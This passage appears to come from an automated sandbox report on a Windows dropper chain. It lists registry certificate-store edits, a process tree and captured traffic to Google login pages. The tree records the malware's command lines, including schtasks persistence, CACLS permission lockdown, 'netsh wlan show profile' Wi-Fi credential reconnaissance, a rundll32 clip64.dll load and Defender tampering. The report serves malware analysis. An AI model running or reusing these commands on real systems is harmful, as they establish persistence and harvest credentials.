67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a legota.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 legota.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 legota.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 legota.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 legota.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a legota.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs
pid Process 880 iexplore.exe 1700 iexplore.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2756 1aN73RF8.exe 2756 1aN73RF8.exe 2328 pf1sbMGHARiKj7J.exe 2340 pf1sbMGHARiKj7J.exe 2340 pf1sbMGHARiKj7J.exe 2340 pf1sbMGHARiKj7J.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2756 1aN73RF8.exe Token: SeDebugPrivilege 2328 pf1sbMGHARiKj7J.exe Token: SeDebugPrivilege 2340 pf1sbMGHARiKj7J.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 1700 iexplore.exe 880 iexplore.exe -
Suspicious use of SetWindowsHookEx 10 IoCs
pid Process 1700 iexplore.exe 1700 iexplore.exe 3056 IEXPLORE.EXE 3056 IEXPLORE.EXE 880 iexplore.exe 880 iexplore.exe 2672 IEXPLORE.EXE 2672 IEXPLORE.EXE 2672 IEXPLORE.EXE 2672 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3064 wrote to memory of 2156 3064 NEAS.56df87530d94170d58020ed2302a6610f69a73b63235acc7a6724892ab573674_JC.exe 27 PID 3064 wrote to memory of 2156 3064 NEAS.56df87530d94170d58020ed2302a6610f69a73b63235acc7a6724892ab573674_JC.exe 27 PID 3064 wrote to memory of 2156 3064 NEAS.56df87530d94170d58020ed2302a6610f69a73b63235acc7a6724892ab573674_JC.exe 27 PID 3064 wrote to memory of 2156 3064 NEAS.56df87530d94170d58020ed2302a6610f69a73b63235acc7a6724892ab573674_JC.exe 27 PID 3064 wrote to memory of 2156 3064 NEAS.56df87530d94170d58020ed2302a6610f69a73b63235acc7a6724892ab573674_JC.exe 27 PID 3064 wrote to memory of 2156 3064 NEAS.56df87530d94170d58020ed2302a6610f69a73b63235acc7a6724892ab573674_JC.exe 27 PID 3064 wrote to memory of 2156 3064 NEAS.56df87530d94170d58020ed2302a6610f69a73b63235acc7a6724892ab573674_JC.exe 27 PID 2156 wrote to memory of 2816 2156 cK5xf37.exe 28 PID 2156 wrote to memory of 2816 2156 cK5xf37.exe 28 PID 2156 wrote to memory of 2816 2156 cK5xf37.exe 28 PID 2156 wrote to memory of 2816 2156 cK5xf37.exe 28 PID 2156 wrote to memory of 2816 2156 cK5xf37.exe 28 PID 2156 wrote to memory of 2816 2156 cK5xf37.exe 28 PID 2156 wrote to memory of 2816 2156 cK5xf37.exe 28 PID 2816 wrote to memory of 2644 2816 pc7OS86.exe 29 PID 2816 wrote to memory of 2644 2816 pc7OS86.exe 29 PID 2816 wrote to memory of 2644 2816 pc7OS86.exe 29 PID 2816 wrote to memory of 2644 2816 pc7OS86.exe 29 PID 2816 wrote to memory of 2644 2816 pc7OS86.exe 29 PID 2816 wrote to memory of 2644 2816 pc7OS86.exe 29 PID 2816 wrote to memory of 2644 2816 pc7OS86.exe 29 PID 2644 wrote to memory of 2080 2644 yt3Dp39.exe 30 PID 2644 wrote to memory of 2080 2644 yt3Dp39.exe 30 PID 2644 wrote to memory of 2080 2644 yt3Dp39.exe 30 PID 2644 wrote to memory of 2080 2644 yt3Dp39.exe 30 PID 2644 wrote to memory of 2080 2644 yt3Dp39.exe 30 PID 2644 wrote to memory of 2080 2644 yt3Dp39.exe 30 PID 2644 wrote to memory of 2080 2644 yt3Dp39.exe 30 PID 2080 wrote to memory of 2756 2080 to4uY17.exe 31 PID 2080 wrote to memory of 2756 2080 to4uY17.exe 31 PID 2080 wrote to memory of 2756 2080 to4uY17.exe 31 PID 2080 wrote to memory of 2756 2080 to4uY17.exe 31 PID 2080 wrote to memory of 2756 2080 to4uY17.exe 31 PID 2080 wrote to memory of 2756 2080 to4uY17.exe 31 PID 2080 wrote to memory of 2756 2080 to4uY17.exe 31 PID 2816 wrote to memory of 904 2816 pc7OS86.exe 34 PID 2816 wrote to memory of 904 2816 pc7OS86.exe 34 PID 2816 wrote to memory of 904 2816 pc7OS86.exe 34 PID 2816 wrote to memory of 904 2816 pc7OS86.exe 34 PID 2816 wrote to memory of 904 2816 pc7OS86.exe 34 PID 2816 wrote to memory of 904 2816 pc7OS86.exe 34 PID 2816 wrote to memory of 904 2816 pc7OS86.exe 34 PID 904 wrote to memory of 2444 904 4Ia413Ie.exe 35 PID 904 wrote to memory of 2444 904 4Ia413Ie.exe 35 PID 904 wrote to memory of 2444 904 4Ia413Ie.exe 35 PID 904 wrote to memory of 2444 904 4Ia413Ie.exe 35 PID 904 wrote to memory of 2444 904 4Ia413Ie.exe 35 PID 904 wrote to memory of 2444 904 4Ia413Ie.exe 35 PID 904 wrote to memory of 2444 904 4Ia413Ie.exe 35 PID 2156 wrote to memory of 1656 2156 cK5xf37.exe 36 PID 2156 wrote to memory of 1656 2156 cK5xf37.exe 36 PID 2156 wrote to memory of 1656 2156 cK5xf37.exe 36 PID 2156 wrote to memory of 1656 2156 cK5xf37.exe 36 PID 2156 wrote to memory of 1656 2156 cK5xf37.exe 36 PID 2156 wrote to memory of 1656 2156 cK5xf37.exe 36 PID 2156 wrote to memory of 1656 2156 cK5xf37.exe 36 PID 2444 wrote to memory of 2760 2444 explothe.exe 37 PID 2444 wrote to memory of 2760 2444 explothe.exe 37 PID 2444 wrote to memory of 2760 2444 explothe.exe 37 PID 2444 wrote to memory of 2760 2444 explothe.exe 37 PID 2444 wrote to memory of 2760 2444 explothe.exe 37 PID 2444 wrote to memory of 2760 2444 explothe.exe 37 PID 2444 wrote to memory of 2760 2444 explothe.exe 37 PID 2444 wrote to memory of 560 2444 explothe.exe 39
Processes
-
C:\Users\Admin\AppData\Local\Temp\NEAS.56df87530d94170d58020ed2302a6610f69a73b63235acc7a6724892ab573674_JC.exe"C:\Users\Admin\AppData\Local\Temp\NEAS.56df87530d94170d58020ed2302a6610f69a73b63235acc7a6724892ab573674_JC.exe"1⤵
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3064 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\cK5xf37.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\cK5xf37.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2156 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\pc7OS86.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\pc7OS86.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2816 -
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\yt3Dp39.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\yt3Dp39.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2644 -
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\to4uY17.exeC:\Users\Admin\AppData\Local\Temp\IXP003.TMP\to4uY17.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2080 -
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1aN73RF8.exeC:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1aN73RF8.exe6⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Loads dropped DLL
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2756
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4Ia413Ie.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4Ia413Ie.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:904 -
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2444 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F6⤵
- Creates scheduled task(s)
PID:2760
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit6⤵PID:560
-
C:\Windows\SysWOW64\cacls.exeCACLS "explothe.exe" /P "Admin:N"7⤵PID:1332
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"7⤵PID:1068
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "explothe.exe" /P "Admin:R" /E7⤵PID:1996
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"7⤵PID:556
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\fefffe8cea" /P "Admin:N"7⤵PID:1688
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\fefffe8cea" /P "Admin:R" /E7⤵PID:544
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main6⤵
- Loads dropped DLL
PID:2168
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\5nT1Fl7.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\5nT1Fl7.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1656 -
C:\Users\Admin\AppData\Local\Temp\cb378487cf\legota.exe"C:\Users\Admin\AppData\Local\Temp\cb378487cf\legota.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
PID:1440 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN legota.exe /TR "C:\Users\Admin\AppData\Local\Temp\cb378487cf\legota.exe" /F5⤵
- Creates scheduled task(s)
PID:2208
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "legota.exe" /P "Admin:N"&&CACLS "legota.exe" /P "Admin:R" /E&&echo Y|CACLS "..\cb378487cf" /P "Admin:N"&&CACLS "..\cb378487cf" /P "Admin:R" /E&&Exit5⤵PID:588
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"6⤵PID:2240
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "legota.exe" /P "Admin:N"6⤵PID:620
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "legota.exe" /P "Admin:R" /E6⤵PID:2128
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"6⤵PID:2204
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\cb378487cf" /P "Admin:N"6⤵PID:1448
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\cb378487cf" /P "Admin:R" /E6⤵PID:2464
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000106101\pf1sbMGHARiKj7J.exe"C:\Users\Admin\AppData\Local\Temp\1000106101\pf1sbMGHARiKj7J.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2328 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hxUzPGlXoN" /XML "C:\Users\Admin\AppData\Local\Temp\tmp166E.tmp"6⤵
- Creates scheduled task(s)
PID:1564
-
-
C:\Users\Admin\AppData\Local\Temp\1000106101\pf1sbMGHARiKj7J.exe"{path}"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops desktop.ini file(s)
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2340 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All7⤵PID:1536
-
C:\Windows\SysWOW64\chcp.comchcp 650018⤵PID:1736
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile8⤵PID:928
-
-
C:\Windows\SysWOW64\findstr.exefindstr All8⤵PID:1348
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid7⤵PID:432
-
C:\Windows\SysWOW64\chcp.comchcp 650018⤵PID:3060
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show networks mode=bssid8⤵PID:2252
-
-
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main5⤵
- Loads dropped DLL
PID:1616
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6Es4UL91.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6Es4UL91.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1880 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\24DF.tmp\24E0.tmp\24E1.bat C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6Es4UL91.exe"3⤵PID:1116
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.facebook.com/login4⤵
- Modifies Internet Explorer settings
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:880 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:880 CREDAT:275457 /prefetch:25⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2672
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://accounts.google.com/4⤵
- Modifies Internet Explorer settings
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:1700 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1700 CREDAT:275457 /prefetch:25⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:3056
-
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {B782FBBE-91B3-439C-B43B-C5E060347BB7} S-1-5-21-686452656-3203474025-4140627569-1000:UUVOHKNL\Admin:Interactive:[1]1⤵PID:1940
-
C:\Users\Admin\AppData\Local\Temp\cb378487cf\legota.exeC:\Users\Admin\AppData\Local\Temp\cb378487cf\legota.exe2⤵
- Executes dropped EXE
PID:1036
-
-
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exeC:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe2⤵
- Executes dropped EXE
PID:2668
-
-
C:\Users\Admin\AppData\Local\Temp\cb378487cf\legota.exeC:\Users\Admin\AppData\Local\Temp\cb378487cf\legota.exe2⤵
- Executes dropped EXE
PID:2476
-
-
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exeC:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe2⤵
- Executes dropped EXE
PID:1016
-
Network
-
Remote address:8.8.8.8:53Requestaccounts.google.comIN AResponseaccounts.google.comIN A142.250.179.141
-
Remote address:142.250.179.141:443RequestGET /_/bscframe HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AYZoVhd5_ErQZ0pIgZabV8Tx7xzGgTAKmru56Gbp_QN-9oRv2Vv1M-JqqdSapGLw9oX-o3itkgPS&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S101681747%3A1696680166053313&theme=glif
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: accounts.google.com
Connection: Keep-Alive
Cookie: __Host-GAPS=1:zQOEd9Ck8mHA3JEzT3AO6zDTCgsXiQ:NmRGDLtEvx9qtb7I; OTZ=7239603_56_56__56_
ResponseHTTP/1.1 200 OK
Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site
X-Frame-Options: SAMEORIGIN
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Sat, 07 Oct 2023 12:02:48 GMT
Content-Security-Policy: script-src 'unsafe-eval';require-trusted-types-for 'script';object-src 'none'
Strict-Transport-Security: max-age=31536000; includeSubDomains
Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="AccountsSignInSignUpUi"
Report-To: {"group":"AccountsSignInSignUpUi","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/AccountsSignInSignUpUi"}]}
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
Cross-Origin-Resource-Policy: same-site
Content-Encoding: gzip
Server: ESF
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Transfer-Encoding: chunked
-
Remote address:142.250.179.141:443RequestGET /generate_204?XYk76A HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AYZoVhd5_ErQZ0pIgZabV8Tx7xzGgTAKmru56Gbp_QN-9oRv2Vv1M-JqqdSapGLw9oX-o3itkgPS&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S101681747%3A1696680166053313&theme=glif
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: accounts.google.com
Connection: Keep-Alive
Cookie: __Host-GAPS=1:QFaHwjs9ga-wkO4VCW93ou4T_nMKPQ:DVaG1eu79sSL7fOr; OTZ=7239603_56_56__56_
ResponseHTTP/1.1 204 No Content
Cross-Origin-Resource-Policy: cross-origin
Date: Sat, 07 Oct 2023 12:02:48 GMT
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
-
Remote address:142.250.179.141:443RequestGET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: accounts.google.com
Connection: Keep-Alive
ResponseHTTP/1.1 302 Moved Temporarily
Strict-Transport-Security: max-age=31536000; includeSubDomains
Set-Cookie: __Host-GAPS=1:0XeHgSNK9aL72BFfHCcdoTGNRzS1VQ:dNVuGHZibg56z1f8;Path=/;Expires=Mon, 06-Oct-2025 12:02:45 GMT;Secure;HttpOnly;Priority=HIGH
X-Frame-Options: DENY
Content-Security-Policy: script-src 'nonce-DMx8fZqE0AAPf0vJr61_iw' 'unsafe-inline' 'unsafe-eval';object-src 'none';base-uri 'self';report-uri /cspreport
Location: https://accounts.google.com/ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F
Content-Encoding: gzip
Date: Sat, 07 Oct 2023 12:02:45 GMT
Expires: Sat, 07 Oct 2023 12:02:45 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Transfer-Encoding: chunked
-
